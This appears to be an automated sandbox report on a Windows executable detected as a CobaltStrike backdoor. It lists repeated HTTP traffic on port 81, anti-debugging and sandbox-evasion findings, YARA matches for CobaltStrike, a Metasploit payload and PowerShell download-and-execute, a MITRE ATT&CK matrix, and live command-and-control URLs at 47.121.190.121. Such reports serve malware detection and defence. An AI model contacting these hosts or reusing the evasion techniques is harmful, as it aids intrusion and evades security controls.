Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50146
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50148
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 50157 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50163
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50165
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50168
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50171
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 50182 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50182
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50183
Source: unknown	Network traffic detected: HTTP traffic on port 50184 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50184
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50185
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50187
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 50190 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50190
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 50192 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50192
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 50194 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50194
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 50196 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50196
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50197
Source: unknown	Network traffic detected: HTTP traffic on port 50198 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50198
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 50200 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50200
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 50204 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50204
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50208
Source: unknown	Network traffic detected: HTTP traffic on port 50209 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50209
Source: unknown	Network traffic detected: HTTP traffic on port 50210 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50210
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50211
Source: unknown	Network traffic detected: HTTP traffic on port 50212 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50212
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50213
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50214
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50215
Source: unknown	Network traffic detected: HTTP traffic on port 50216 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50216

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006BE0E8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_006BE0E8

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006AF654		0_2_006AF654
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B3FA4		0_2_006B3FA4

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Window / User API: threadDelayed 4526			Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Window / User API: threadDelayed 5253			Jump to behavior

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_0-32293
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-32377

Source: C:\Users\user\Desktop\THsSNYblMw.exe

API coverage: 8.1 %

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006B3FA4

0_2_006B3FA4

Source: C:\Users\user\Desktop\THsSNYblMw.exe TID: 6872	Thread sleep count: 4526 > 30	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe TID: 6872	Thread sleep time: -45260000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe TID: 6916	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe TID: 6872	Thread sleep count: 5253 > 30	Jump to behavior
Source: C:\Users\user\Desktop\THsSNYblMw.exe TID: 6872	Thread sleep time: -52530000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B780C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_006B780C
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B0F28 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_006B0F28

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: THsSNYblMw.exe, 00000000.00000002.4147628673.00000000007B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: THsSNYblMw.exe, 00000000.00000002.4147628673.000000000076E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Users\user\Desktop\THsSNYblMw.exe	API call chain: ExitProcess graph end node			graph_0-32359
Source: C:\Users\user\Desktop\THsSNYblMw.exe	API call chain: ExitProcess graph end node			graph_0-32062

Anti Debugging

Found potential dummy code loops (likely to delay analysis)

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Process Stats: CPU usage > 42% for more than 60s

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006C0090 __crtCaptureCurrentContext,IsDebuggerPresent,__crtUnhandledException,

0_2_006C0090

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006C7604 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_006C7604

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_0040DF90 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,ExitProcess,

0_2_0040DF90

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006D01D0 GetProcessHeap,

0_2_006D01D0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,	0_2_00401180
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_00402F69 SetUnhandledExceptionFilter,	0_2_00402F69
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_00401A70
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006C2384 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006C2384
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006D04F0 SetUnhandledExceptionFilter,	0_2_006D04F0

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: THsSNYblMw.exe PID: 6864, type: MEMORYSTR

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006BBEF0 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_006BBEF0

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006D0050 AllocateAndInitializeSid,

0_2_006D0050

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,

0_2_00401630

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00401990

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006B4578 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_006B4578

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006B4578 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_006B4578

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: THsSNYblMw.exe PID: 6864, type: MEMORYSTR
Source: Yara match	File source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Metasploit Payload

Source: Yara match

File source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B5100 socket,htons,ioctlsocket,closesocket,bind,listen,	0_2_006B5100
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B4CF8 htonl,htons,socket,closesocket,bind,ioctlsocket,	0_2_006B4CF8
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006D0630 bind,	0_2_006D0630
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006BCE10 socket,closesocket,htons,bind,listen,	0_2_006BCE10

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	2 Valid Accounts	2 Valid Accounts	2 Valid Accounts	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	21 Access Token Manipulation	112 Virtualization/Sandbox Evasion	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Process Injection	21 Access Token Manipulation	Security Account Manager	112 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	111 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	4 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
THsSNYblMw.exe	76%	ReversingLabs	Win64.Backdoor.CobaltStrike
THsSNYblMw.exe	100%	Avira	HEUR/AGEN.1345031
THsSNYblMw.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://47.121.190.121/aGDq	0%	Avira URL Cloud	safe
http://47.121.190.121:81/dot.gifv	0%	Avira URL Cloud	safe
http://47.121.190.121:81/dot.gift	0%	Avira URL Cloud	safe
http://7.121.190.121:81/aGDq	0%	Avira URL Cloud	safe
http://47.121.190.121:81/aGDq	0%	Avira URL Cloud	safe
http://47.121.190.121:81/aGDq2YZm	0%	Avira URL Cloud	safe
http://47.121.190.121:81/dot.gif.121:81/dot.gifKT	0%	Avira URL Cloud	safe
http://47.121.190.121:81/dot.gif	0%	Avira URL Cloud	safe
http://47.121.190.121:81/dot.gif7Y	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://7.121.190.121:81/aGDq	true	Avira URL Cloud: safe	unknown
http://47.121.190.121/aGDq	true	Avira URL Cloud: safe	unknown
http://47.121.190.121:81/aGDq	true	Avira URL Cloud: safe	unknown
http://47.121.190.121:81/dot.gif	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://47.121.190.121:81/dot.gifv	THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000789000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:%u/	THsSNYblMw.exe, 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	false		high
http://47.121.190.121:81/dot.gift	THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000789000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.121.190.121:81/dot.gif.121:81/dot.gifKT	THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000792000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.121.190.121:81/aGDq2YZm	THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000792000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.121.190.121:81/dot.gif7Y	THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000792000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
